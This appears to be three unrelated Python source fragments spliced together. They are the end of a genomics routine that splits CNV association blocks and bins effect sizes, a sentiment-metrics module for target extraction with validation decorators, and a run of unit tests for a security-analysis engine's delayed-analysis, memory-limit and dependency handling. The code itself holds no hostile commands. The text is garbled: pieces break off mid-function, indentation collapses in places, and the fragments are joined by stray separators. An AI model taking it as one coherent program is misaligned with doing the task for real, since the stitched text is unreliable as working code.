    multi-clump blocks removed.
    """
    for hpo, hdat in hpo_data.items():
        split_count = 0
        sig_wids = list(hdat['sig_windows'].keys())
        # Snapshot the block ids so hdat['blocks'] can be mutated while iterating
        for block_id in list(hdat['blocks'].keys()):
            bdat = hdat['blocks'][block_id]
            block_wids = list(bdat['refine_res'].keys())
            sig_block_wids = list(set(sig_wids).intersection(set(block_wids)))
            chrom = bdat['credset_coords'][0][0]
            # Note: only consider covariance between sig windows when assessing
            # independence, to avoid chaining of single-linkage between
            # intermediate blocks
            cov_df = cnv_cov[hpo][chrom]
            cov_df = cov_df.loc[cov_df.index.isin(sig_block_wids),
                                cov_df.columns.isin(sig_block_wids)]
            window_clumps = clump_windows(cov_df, sig_block_wids, jac_cutoff)
            # A single clump means the block is already coherent; leave it alone
            if len(window_clumps) <= 1:
                continue
            # Multiple independent CNV clumps: emit one new block per clump
            for clump in window_clumps:
                clump_bt = pbt.BedTool('\n'.join(['\t'.join(x.split('_') + [x]) for x in clump]),
                                       from_string=True).sort()
                clump_coords = clump_bt.merge(c=4, o='distinct')
                uniform_priors = {window : 1 / len(clump) for window in clump}
                refine_res, credset_coords, credset_bt, credset_windows \
                    = refine(uniform_priors, hdat['all_windows'], null_variance,
                             cs_val, cs_merge_buffer=0)
                split_count += 1
                new_block_id = '_'.join([hpo, block_prefix, 'split', str(split_count)])
                # Maximum significance level of any window in the credible set
                if any([hdat['all_windows'][wid]['gw_sig'] for wid in credset_windows]):
                    credset_max_sig = 'genome_wide'
                elif any([hdat['all_windows'][wid]['fdr_sig'] for wid in credset_windows]):
                    credset_max_sig = 'FDR'
                else:
                    credset_max_sig = 'not_significant'
                hpo_data[hpo]['blocks'][new_block_id] = \
                    {'coords' : clump_coords,
                     'refine_res' : refine_res,
                     'credset_coords' : credset_coords,
                     'credset_bt' : credset_bt,
                     'credset_windows' : credset_windows,
                     'credset_max_sig' : credset_max_sig}
            # Drop the original block now that it has been split
            hpo_data[hpo]['blocks'].pop(block_id)
    return hpo_data
def assign_or_quantiles(hpo_data, n_or_bins=1):
    """
    Assign all associations (blocks) into quantiles based on effect size.

    hpo_data : dict keyed by HPO; each block gains an integer 'lnor_quantile'
               key in [0, n_or_bins - 1]
    n_or_bins : number of effect-size quantile bins

    Returns the (mutated) hpo_data.
    """
    # Gather effect size estimate of most significant window per block
    lnors = {}
    for hpo, hdat in hpo_data.items():
        for bid, bdat in hdat['blocks'].items():
            best_p = 1
            best_lnor = 0
            for wid in bdat['refine_res'].keys():
                w_p = hdat['all_windows'][wid]['primary_p']
                if w_p < best_p:
                    best_p = w_p
                    best_lnor = hdat['all_windows'][wid]['lnOR']
            lnors[bid] = {'lnor' : best_lnor, 'hpo' : hpo}
    # Nothing to bin; also avoids division by zero below
    if not lnors:
        return hpo_data
    # Assign blocks to quantiles by rank of effect size.
    # Bug fix: np.argsort returns the *indices* that would sort the array, not
    # the rank of each element; using it directly attached quantiles to the
    # wrong blocks. The rank of each element is argsort applied twice.
    lnor_values = np.array([x['lnor'] for x in lnors.values()])
    ranks = np.argsort(np.argsort(lnor_values))
    quants = np.floor(n_or_bins * ranks / len(lnors))
    qdict = {a : int(b) for a, b in zip(lnors.keys(), quants)}
    for bid in qdict.keys():
        hpo_data[lnors[bid]['hpo']]['blocks'][bid]['lnor_quantile'] = qdict[bid]
    return hpo_data
def estimate_null_variance_basic(hpo_data, Wsq, dev_hpos=[], n_or_bins=1,
split_gw_fdr=False):
"""
Estimates null variance from average of all significant windows and best window per block
"""
# Compute 2 null variance estimates for refining:
# 1. Mean of all significant windows
# 2. Mean of all top windows (one per block)
vardict_sig = {hpo : {'gw' : {i : [] for i in range(n_or_bins + 1)},
'fdr' : {i : [] for i in range(n_or_bins + 1)}} \
for hpo in hpo_data.keys()}
vardict_best = {hpo : {'gw' : {i : [] for i in range(n_or_bins + 1)},
'fdr' : {i : [] for i in range(n_or_bins + 1)}} \
for hpo in hpo_data.keys()}
# Collect variance estimates from each significant block
for hpo, dat in hpo_data.items():
| |
<filename>target_extraction/analysis/sentiment_metrics.py
'''
This module contains functions that expect a TargetTextCollection that contains
`target_sentiments` key that represent the true sentiment values and a prediction
key e.g. `sentiment_predictions`. Given these the function will return either a
metric score e.g. Accuracy or a list of scores based on the arguments given
to the function and if the `sentiment_predictions` key is an array of values.
Arguments for all functions in this module:
1. TargetTextCollection -- Contains the true and predicted sentiment scores
2. true_sentiment_key -- Key that contains the true sentiment scores
for each target in the TargetTextCollection
3. predicted_sentiment_key -- Key that contains the predicted sentiment scores
for each target in the TargetTextCollection
4. average -- If the predicting model was ran *N* times whether or not to
average the score over the *N* runs. Assumes array_scores is False.
5. array_scores -- If average is False and you have a model that has predicted
*N* times then this will return the *N* scores, one for each run.
6. assert_number_labels -- Whether or not to assert this many number of unique
labels must exist in the true sentiment key. If this is None then the
assertion is not raised.
7. ignore_label_differences -- If True then the ValueError will not be
raised if the predicted sentiment values are not in the true
sentiment values. See :py:func:`get_labels` for more details.
:raises ValueError: If the prediction model has run *N* times where
*N>1* and `average` or `array_scores` are either both
True or both False.
:raises ValueError: If the number of predictions made per target are
different or zero.
:raises ValueError: If only one set of model predictions exists then
`average` and `array_scores` should be False.
:raises KeyError: If either the `true_sentiment_key` or
`predicted_sentiment_key` does not exist.
:raises LabelError: If `assert_number_labels` is not None and the number of
unique true labels does not equal the `assert_number_labels`
this is raised.
'''
import functools
from typing import Union, Optional, Callable, Tuple, List, Any
import statistics
import numpy as np
from sklearn.metrics import accuracy_score, f1_score
from target_extraction.data_types import TargetTextCollection, TargetText
class LabelError(Exception):
    '''
    Raised when the number of unique labels found in the dataset does not
    match the expected number of unique labels.
    '''

    def __init__(self, true_number_unique_labels: int,
                 number_unique_labels_wanted: int) -> None:
        '''
        :param true_number_unique_labels: Number of unique labels that came
                                          from the dataset
        :param number_unique_labels_wanted: Expected number of unique labels
                                            that should be in the dataset.
        '''
        message = (f'Number of unique labels in the dataset '
                   f'{true_number_unique_labels}. The number of unique '
                   f'labels expected in the dataset '
                   f'{number_unique_labels_wanted}')
        super().__init__(message)
def metric_error_checks(func: Callable[[TargetTextCollection, str, str, bool,
                                        bool, Optional[int], bool],
                                       Union[float, np.ndarray]]
                        ) -> Callable[[TargetTextCollection, str, str, bool,
                                       bool, Optional[int], bool],
                                      Union[float, np.ndarray]]:
    '''
    Decorator for the metric functions within this module. Will raise any of
    the Errors stated above in the module documentation before the metric
    function is called.
    '''
    @functools.wraps(func)
    def wrapper(target_collection: TargetTextCollection,
                true_sentiment_key: str, predicted_sentiment_key: str,
                average: bool, array_scores: bool,
                assert_number_labels: Optional[int] = None,
                ignore_label_differences: bool = True,
                **kwargs
                ) -> Union[float, np.ndarray]:
        # Check that the TargetTextCollection contains both the true and
        # predicted sentiment keys
        unique_label_set = set()
        total_number_model_predictions = 0
        for target_object in target_collection.values():
            target_object: TargetText
            # _key_error raises KeyError if the key is missing on this target
            target_object._key_error(true_sentiment_key)
            target_object._key_error(predicted_sentiment_key)
            for true_label in target_object[true_sentiment_key]:
                unique_label_set.add(true_label)
            # Cannot have inconsistent number of model predictions
            number_model_predictions = len(target_object[predicted_sentiment_key])
            if total_number_model_predictions == 0:
                total_number_model_predictions = number_model_predictions
            else:
                if total_number_model_predictions != number_model_predictions:
                    raise ValueError('The number of predictions made per '
                                     'Target within the collection is different'
                                     f'. This TargetText could have no targets'
                                     ' within the collection thus this error '
                                     'will be raise. TargetText that has an error'
                                     f' {target_object}\nThe number of predcitions'
                                     f' that this object should have: {total_number_model_predictions}')
        # Cannot have zero predictions
        if total_number_model_predictions == 0:
            raise ValueError('The number of predictions made per target are zero')
        # Perform the LabelError check
        if assert_number_labels is not None:
            number_unique_labels = len(unique_label_set)
            if number_unique_labels != assert_number_labels:
                raise LabelError(number_unique_labels, assert_number_labels)
        # If the dataset has one model prediction per target then average and
        # array_scores should be False
        # NOTE(review): `number_model_predictions` is only bound inside the
        # loop above, so an empty collection would raise NameError here —
        # confirm callers never pass an empty TargetTextCollection.
        if number_model_predictions == 1:
            if average or array_scores:
                raise ValueError('When only one set of predictions per target'
                                 ' then `average` and `array_scores` have to '
                                 'be both False')
        else:
            if average == array_scores:
                raise ValueError('As the number of model predictions is > 1 '
                                 'then either `average` or `array_scores` have '
                                 'to be True but not both.')
        # All checks passed; delegate to the wrapped metric function
        return func(target_collection, true_sentiment_key,
                    predicted_sentiment_key, average, array_scores,
                    assert_number_labels, ignore_label_differences,
                    **kwargs)
    return wrapper
def get_labels(target_collection: TargetTextCollection,
               true_sentiment_key: str, predicted_sentiment_key: str,
               labels_per_text: bool = False,
               ignore_label_differences: bool = True
               ) -> Tuple[Union[List[Any], List[List[Any]]],
                          Union[List[List[Any]], List[List[List[Any]]]]]:
    '''
    :param target_collection: Collection of targets that have true and predicted
                              sentiment values.
    :param true_sentiment_key: Key that contains the true sentiment scores
                               for each target in the TargetTextCollection
    :param predicted_sentiment_key: Key that contains the predicted sentiment
                                    scores for each target in the
                                    TargetTextCollection. It assumes that the
                                    predictions is a List of List where the
                                    outer list are the number of model runs and
                                    the inner list is the number of targets to
                                    predict for, see the second Tuple of the
                                    example return for an example of this.
    :param labels_per_text: If True instead of returning a List[Any] it will
                            return a List[List[Any]] where in the inner list
                            represents the predictions per text rather than in
                            the normal case where it is all predictions ignoring
                            which text they came from.
    :param ignore_label_differences: If True then the ValueError will not be
                                     raised if the predicted sentiment values
                                     are not in the true sentiment values.
    :returns: A tuple of 1; true sentiment value 2; predicted sentiment values.
              where the predicted sentiment values is a list of predicted
              sentiment value, one for each models predictions.
              See `Example of return 2` for an example of what this means
              where in that example there are two texts/sentences.
    :raises ValueError: If the number of predicted sentiment values are not
                        equal to the number true sentiment values.
    :raises ValueError: If the labels in the predicted sentiment values are not
                        in the true sentiment values.
    :Example of return 1: (['pos', 'neg', 'neu'], [['neg', 'pos', 'neu'],
                          ['neu', 'pos', 'neu']])
    :Example of return 2: ([['pos'], ['neg', 'neu']], [[['neg'], ['pos', 'neu']],
                          [['neu'], ['pos', 'neu']]])
    '''
    all_predicted_values: List[List[Any]] = []
    all_true_values: List[Any] = []
    for target_object in target_collection.values():
        target_object: TargetText
        true_values = target_object[true_sentiment_key]
        if labels_per_text:
            all_true_values.append(true_values)
        else:
            all_true_values.extend(true_values)
        predicted_values_lists = target_object[predicted_sentiment_key]
        # Create a list per model predictions
        # NOTE(review): the number of model runs is fixed by the first target
        # processed; the decorator `metric_error_checks` enforces consistency.
        if all_predicted_values == []:
            for _ in predicted_values_lists:
                all_predicted_values.append([])
        for index, prediction_list in enumerate(predicted_values_lists):
            if labels_per_text:
                all_predicted_values[index].append(prediction_list)
            else:
                all_predicted_values[index].extend(prediction_list)
    # Check that the number of values in the predicted values is the same as
    # the number of values in the true list
    true_number_values = len(all_true_values)
    for prediction_list in all_predicted_values:
        number_predictions = len(prediction_list)
        if number_predictions != true_number_values:
            raise ValueError(f'Number targets predicted {number_predictions}. '
                             f'Number of targets {true_number_values}. '
                             'These should be the same!')
    # Check that the values in True are the same as those in predicted
    # (when labels_per_text the values are nested one level deeper, hence
    # the flattening comprehensions)
    if labels_per_text:
        unique_true_values = set([value for values in all_true_values for value in values])
    else:
        unique_true_values = set(all_true_values)
    for prediction_list in all_predicted_values:
        if labels_per_text:
            unique_predicted_values = set([value for values in prediction_list for value in values])
        else:
            unique_predicted_values = set(prediction_list)
        if (unique_predicted_values.difference(unique_true_values) and
            not ignore_label_differences):
            raise ValueError(f'Values in the predicted sentiment are not in the'
                             ' True sentiment values. Values in predicted '
                             f'{unique_predicted_values}, values in True '
                             f'{unique_true_values}')
    return (all_true_values, all_predicted_values)
@metric_error_checks
def accuracy(target_collection: TargetTextCollection,
true_sentiment_key: str, predicted_sentiment_key: str,
average: bool, array_scores: bool,
assert_number_labels: Optional[int] = None,
ignore_label_differences: bool = True
) -> Union[float, List[float]]:
'''
:param ignore_label_differences: See :py:func:`get_labels`
Accuracy score. Description at top of module explains arguments.
'''
true_values, predicted_values_list = get_labels(target_collection,
true_sentiment_key,
predicted_sentiment_key,
ignore_label_differences=ignore_label_differences)
scores: List[float] = []
for | |
= TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
from saq.modules.test import DelayedAnalysisTestAnalysis
root = create_root_analysis(uuid=root.uuid, storage_dir=storage_dir_from_uuid(root.uuid))
root.load()
analysis = root.get_observable(observable.id).get_analysis(DelayedAnalysisTestAnalysis)
self.assertIsNotNone(analysis)
self.assertTrue(analysis.initial_request)
self.assertTrue(analysis.delayed_request)
self.assertEquals(analysis.request_count, 2)
self.assertTrue(analysis.completed)
def test_delayed_analysis_multiple(self):
uuids = []
for i in range(3):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.storage_dir = storage_dir_from_uuid(root.uuid)
root.initialize_storage()
observable = root.add_observable(F_TEST, '0:01|0:05')
root.save()
root.schedule()
uuids.append((root.uuid, observable.id))
engine = TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
from saq.modules.test import DelayedAnalysisTestAnalysis
for root_uuid, observable_uuid in uuids:
root = create_root_analysis(uuid=root_uuid, storage_dir=storage_dir_from_uuid(root_uuid))
root.load()
analysis = root.get_observable(observable_uuid).get_analysis(DelayedAnalysisTestAnalysis)
self.assertTrue(analysis.initial_request)
self.assertTrue(analysis.delayed_request)
self.assertEquals(analysis.request_count, 2)
self.assertTrue(analysis.completed)
def test_delayed_analysis_timing(self):
root_1 = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root_1.initialize_storage()
o_1 = root_1.add_observable(F_TEST, '0:04|0:10')
root_1.save()
root_1.schedule()
root_2 = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root_2.initialize_storage()
o_2 = root_2.add_observable(F_TEST, '0:01|0:10')
root_2.save()
root_2.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
from saq.modules.test import DelayedAnalysisTestAnalysis
# the second one should finish before the first one
root_1 = RootAnalysis(uuid=root_1.uuid, storage_dir=root_1.storage_dir)
root_1.load()
analysis_1 = root_1.get_observable(o_1.id).get_analysis(DelayedAnalysisTestAnalysis)
self.assertTrue(analysis_1.initial_request)
self.assertTrue(analysis_1.delayed_request)
self.assertEquals(analysis_1.request_count, 2)
self.assertTrue(analysis_1.completed)
root_2 = RootAnalysis(uuid=root_2.uuid, storage_dir=root_2.storage_dir)
root_2.load()
analysis_2 = root_2.get_observable(o_2.id).get_analysis(DelayedAnalysisTestAnalysis)
self.assertTrue(analysis_2.initial_request)
self.assertTrue(analysis_2.delayed_request)
self.assertEquals(analysis_2.request_count, 2)
self.assertTrue(analysis_2.completed)
self.assertLess(analysis_2.complete_time, analysis_1.complete_time)
def test_unix_signals(self):
engine = TestEngine()
engine.start()
# tell ACE to reload the configuration and then reload all the workers
os.kill(engine.engine_process.pid, signal.SIGHUP)
wait_for_log_count('reloading engine configuration', 1, 5)
wait_for_log_count('got command to restart workers', 1, 5)
wait_for_log_count('started worker loop', 2)
engine.controlled_stop()
engine.wait()
@track_io
def test_io_count(self):
self.assertEquals(_get_io_write_count(), 0)
self.assertEquals(_get_io_read_count(), 0)
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_single')
root.initialize_storage()
observable = root.add_observable(F_TEST, 'test_1')
root.save()
root.schedule()
self.assertEquals(_get_io_write_count(), 1)
self.assertEquals(_get_io_read_count(), 0)
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_basic_test')
engine.controlled_stop()
engine.start()
engine.wait()
# at this point it should have loaded the root analysis
# and then saved it again along with the details for the BasicTestAnalysis
self.assertEquals(_get_io_write_count(), 3)
self.assertEquals(_get_io_read_count(), 1)
from saq.modules.test import BasicTestAnalysis
root = create_root_analysis(storage_dir=root.storage_dir)
root.load()
self.assertEquals(_get_io_write_count(), 3)
self.assertEquals(_get_io_read_count(), 2)
analysis = root.get_observable(observable.id).get_analysis(BasicTestAnalysis)
self.assertEquals(_get_io_read_count(), 2) # should not have loaded details yet...
self.assertTrue(analysis.test_result)
self.assertEquals(_get_io_read_count(), 3)
@track_io
def test_delayed_analysis_io_count(self):
self.assertEquals(_get_io_write_count(), 0)
self.assertEquals(_get_io_read_count(), 0)
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
observable = root.add_observable(F_TEST, '00:01|00:05')
root.save()
root.schedule()
self.assertEquals(_get_io_write_count(), 1)
self.assertEquals(_get_io_read_count(), 0)
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
# expect 5 writes at this point
# (1) initial root analysis save
# (2) initial module save
# (3) root analysis completed save
# (4) updated module save
# (5) root analysis completed save
self.assertEquals(_get_io_write_count(), 5)
# and then 4 reads (one LOAD for each, iterated twice)
self.assertEquals(_get_io_read_count(), 3)
from saq.modules.test import DelayedAnalysisTestAnalysis
root = create_root_analysis(uuid=root.uuid)
self.assertTrue(root.load())
self.assertEquals(_get_io_write_count(), 5)
self.assertEquals(_get_io_read_count(), 4)
analysis = root.get_observable(observable.id).get_analysis(DelayedAnalysisTestAnalysis)
self.assertIsNotNone(analysis)
self.assertEquals(_get_io_read_count(), 4) # should not have loaded details yet...
self.assertTrue(analysis.delayed_request)
self.assertEquals(_get_io_read_count(), 5)
def test_autorefresh(self):
saq.CONFIG['engine']['auto_refresh_frequency'] = '3'
engine = TestEngine(pool_size_limit=1)
engine.start()
wait_for_log_count('triggered reload of worker modules', 1)
wait_for_log_count('detected death of process', 1)
engine.controlled_stop()
engine.wait()
def test_memory_limit(self):
from saq.database import Workload, Lock
# reduce the limits so the test is easier
saq.CONFIG['global']['memory_limit_warning'] = '128'
saq.CONFIG['global']['memory_limit_kill'] = '256'
root = create_root_analysis()
root.initialize_storage()
observable = root.add_observable(F_TEST, 'test_memory_limit_warning')
root.save()
root.schedule()
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_basic_test')
engine.start()
time.sleep(3)
engine.controlled_stop()
engine.wait()
# we should see a warning message about taking up too much memory
wait_for_log_count('is using too much memory', 1)
# same thing as before except we allocate so much memory we force ace to kill the process
root = create_root_analysis()
root.initialize_storage()
observable = root.add_observable(F_TEST, 'test_memory_limit_kill')
root.save()
root.schedule()
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_basic_test')
engine.start()
time.sleep(3)
engine.controlled_stop()
engine.wait()
# we should see a warning message about taking up too much memory
wait_for_log_count('used too much memory', 1, 10)
# we should NOT see a workload item or a lock left
self.assertEquals(saq.db.query(Workload.id).count(), 0)
self.assertEquals(saq.db.query(Lock.uuid).count(), 0)
def test_final_analysis(self):
"""Test final analysis execution."""
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
observable = root.add_observable(F_TEST, 'test')
root.save()
root.schedule()
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_test_final_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
# we should have a single observable now
root = create_root_analysis(uuid=root.uuid)
root.load()
self.assertEquals(len(root.all_observables), 1)
self.assertTrue(root.has_observable(F_TEST, 'test'))
from saq.modules.test import FinalAnalysisTestAnalysis
analysis = root.get_observable(observable.id).get_analysis(FinalAnalysisTestAnalysis)
self.assertIsNotNone(analysis)
# we should have seen this twice since the modification of adding an analysis will triggert
# final analysis again
self.assertEquals(log_count('entering final analysis for '), 2)
@track_io
def test_final_analysis_io_count(self):
self.assertEquals(_get_io_write_count(), 0)
self.assertEquals(_get_io_read_count(), 0)
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
observable = root.add_observable(F_TEST, 'test')
root.save()
root.schedule()
self.assertEquals(_get_io_write_count(), 1)
self.assertEquals(_get_io_read_count(), 0)
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_test_final_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
self.assertEquals(_get_io_write_count(), 3)
self.assertEquals(_get_io_read_count(), 1)
self.assertEquals(log_count('entering final analysis for '), 2)
@track_io
def test_final_analysis_io_count_2(self):
"""Same thing as before but we test with multiple observables."""
self.assertEquals(_get_io_write_count(), 0)
self.assertEquals(_get_io_read_count(), 0)
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
observable_1 = root.add_observable(F_TEST, 'test_01')
observable_2 = root.add_observable(F_TEST, 'test_02')
root.save()
root.schedule()
self.assertEquals(_get_io_write_count(), 1)
self.assertEquals(_get_io_read_count(), 0)
engine = TestEngine(pool_size_limit=1)
engine.enable_module('analysis_module_test_final_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
self.assertEquals(_get_io_write_count(), 4)
self.assertEquals(_get_io_read_count(), 1)
self.assertEquals(log_count('entering final analysis for '), 3)
# ensure that post analysis is executed even if delayed analysis times out
def test_delayed_analysis_timeout(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
test_observable = root.add_observable(F_TEST, '0:01|0:01')
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis_timeout', 'test_groups')
engine.enable_module('analysis_module_test_post_analysis', 'test_groups')
engine.start()
# wait for delayed analysis to time out
wait_for_log_count('has timed out', 1)
engine.controlled_stop()
engine.wait()
# post analysis should have executed
self.assertEquals(log_count('execute_post_analysis called'), 1)
def test_delayed_analysis_recovery(self):
from saq.database import DelayedAnalysis, Workload
# scenario: delayed analysis starts, ace engine stops and then starts back up
# the delayed analysis should pick back up and complete
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.storage_dir = storage_dir_from_uuid(root.uuid)
root.initialize_storage()
observable = root.add_observable(F_TEST, '0:05|0:10')
root.save()
root.schedule()
engine = TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
# wait until we see the delay in the queue
wait_for_log_count('queue sizes workload 0 delayed 1', 1)
# now kill the engine
engine.stop()
engine.wait()
# we should have one delayed analysis still in the queue
self.assertEquals(saq.db.query(DelayedAnalysis.id).count(), 1)
# and nothing in the workload queue
self.assertEquals(saq.db.query(Workload.id).count(), 0)
# start another engine back up
engine = TestEngine()
engine.enable_module('analysis_module_test_delayed_analysis')
engine.controlled_stop()
engine.start()
engine.wait()
from saq.modules.test import DelayedAnalysisTestAnalysis
root = create_root_analysis(uuid=root.uuid, storage_dir=storage_dir_from_uuid(root.uuid))
root.load()
analysis = root.get_observable(observable.id).get_analysis(DelayedAnalysisTestAnalysis)
self.assertIsNotNone(analysis)
self.assertTrue(analysis.initial_request)
self.assertTrue(analysis.delayed_request)
self.assertEquals(analysis.request_count, 2)
self.assertTrue(analysis.completed)
# queue should be empty
saq.db.close()
self.assertEquals(saq.db.query(DelayedAnalysis.id).count(), 0)
self.assertEquals(saq.db.query(Workload.id).count(), 0)
def test_wait_for_analysis(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_1')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(uuid=root.uuid, storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_B))
self.assertEquals(log_count("depends on"), 1)
def test_wait_for_disabled_analysis(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_1')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
#engine.enable_module('analysis_module_test_wait_b')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_B))
#self.assertEquals(log_count("requested to wait for disabled (or missing) module"), 1)
self.clear_error_reports()
def test_wait_for_analysis_circ_dep(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_2')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_B))
self.assertEquals(log_count("CIRCULAR DEPENDENCY ERROR"), 1)
def test_wait_for_analysis_missing_analysis(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_3')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B
self.assertFalse(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_B))
# we would only see this log if A waited on B
#self.assertEquals(log_count("did not generate analysis to resolve dep"), 1)
def test_wait_for_analysis_circ_dep_chained(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_4')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.enable_module('analysis_module_test_wait_c', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B, WaitAnalysis_C
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_B))
self.assertIsNone(test_observable.get_analysis(WaitAnalysis_C))
self.assertEquals(log_count("CIRCULAR DEPENDENCY ERROR"), 1)
def test_wait_for_analysis_chained(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_5')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.enable_module('analysis_module_test_wait_c', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B, WaitAnalysis_C
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_B))
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_C))
self.assertEquals(log_count("CIRCULAR DEPENDENCY ERROR"), 0)
def test_wait_for_analysis_delayed(self):
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_6')
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.controlled_stop()
engine.start()
engine.wait()
root = RootAnalysis(storage_dir=root.storage_dir)
root.load()
test_observable = root.get_observable(test_observable.id)
self.assertIsNotNone(test_observable)
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_A))
self.assertIsNotNone(test_observable.get_analysis(WaitAnalysis_B))
def test_wait_for_analysis_rejected(self):
from saq.modules.test import WaitAnalysis_A, WaitAnalysis_B, WaitAnalysis_C, \
WaitAnalyzerModule_B
root = create_root_analysis(uuid=str(uuid.uuid4()), analysis_mode='test_groups')
root.initialize_storage()
test_observable = root.add_observable(F_TEST, 'test_engine_032a')
test_observable.exclude_analysis(WaitAnalyzerModule_B)
root.save()
root.schedule()
engine = TestEngine(analysis_pools={'test_groups': 1})
engine.enable_module('analysis_module_test_wait_a', 'test_groups')
engine.enable_module('analysis_module_test_wait_b', 'test_groups')
engine.enable_module('analysis_module_test_wait_c', 'test_groups')
engine.controlled_stop()
